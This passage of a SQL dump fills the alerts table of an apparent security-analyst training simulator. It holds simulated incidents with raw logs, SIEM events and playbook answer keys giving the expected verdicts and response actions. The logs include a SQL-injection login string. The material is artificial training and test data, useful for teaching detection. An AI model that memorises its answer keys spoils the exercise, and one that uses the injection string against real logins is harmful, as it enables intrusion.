HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.740Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-23T10:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"url\\\":\\\"/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1044, 'Suspicious Activity Detected in Contact Importer', 'high', 'Security Information and Event Management (SIEM) logs', 'An unusual spike in API calls to the contact importer feature was detected, indicating a potential exploitation attempt to gain unauthorized access to user data. The activity appears to originate from a known malicious IP address.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"api_endpoint\":\"/api/v1/contact-import\",\"http_method\":\"POST\",\"request_headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Content-Type\":\"application/json\"},\"request_body\":\"{\\\"contacts\\\":[{\\\"name\\\":\\\"John Doe\\\",\\\"email\\\":\\\"john.doe@example.com\\\"}]}\",\"response_code\":500,\"user_agent_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jane.smith\",\"session_id\":\"abc123sessiontoken\"}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks on public-facing applications.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server used for contact importing.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Associated with common user agents.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1045, 'Malicious Script Execution in API Interactions', 'high', 'Web server logs and API request analysis', 'An advanced persistent threat actor has executed a script to automate the extraction of sensitive data, including phone numbers and personal details, from the API. This operation bypasses the usual rate limits and security measures by exploiting vulnerabilities in the web server logic.', 'Execution', 'T1059.007 - Command and Scripting Interpreter: JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"request_method\":\"POST\",\"endpoint\":\"/api/v1/data/extract\",\"script_name\":\"extractor.js\",\"execution_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"attacker_user\",\"response_code\":200,\"data_extracted\":[\"phone_numbers\",\"personal_details\"]}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal web server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked with known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"extractor.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script name found in unauthorized API requests.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in typical user access logs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1046, 'Persistence Through Credential Stuffing', 'high', 'Login activity and failed login attempts', 'The attacker uses credential stuffing techniques to maintain persistent access, leveraging previously breached credentials to avoid detection. Multiple login attempts from a known malicious IP address were detected targeting several user accounts within the network.', 'Persistence', 'T1078.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.15\",\"username_attempted\":\"jdoe\",\"internal_ip\":\"192.168.1.100\",\"failed_attempts\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"POST\",\"url\":\"/login\",\"response_code\":401,\"detected_by\":\"SIEM System\",\"additional_info\":{\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"related_filename\":\"malicious_script.exe\"}}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"internal\",\"details\":\"User account targeted in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as a credential harvesting tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Identified as part of a known attack toolkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1047, 'Lateral Movement via Compromised Accounts', 'high', 'User account activity logs', 'An attacker has expanded their access by compromising additional user accounts through social engineering tactics. This allows access to more user data across the platform.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T15:30:45Z\",\"event_type\":\"user_login\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.5.23\",\"username\":\"compromised_user\",\"event_description\":\"Successful login with compromised credentials\",\"associated_files\":[{\"filename\":\"payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"}],\"malicious_activity\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal network\",\"verdict\":\"internal\",\"details\":\"Internal corporate IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity flagged for unusual login pattern\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 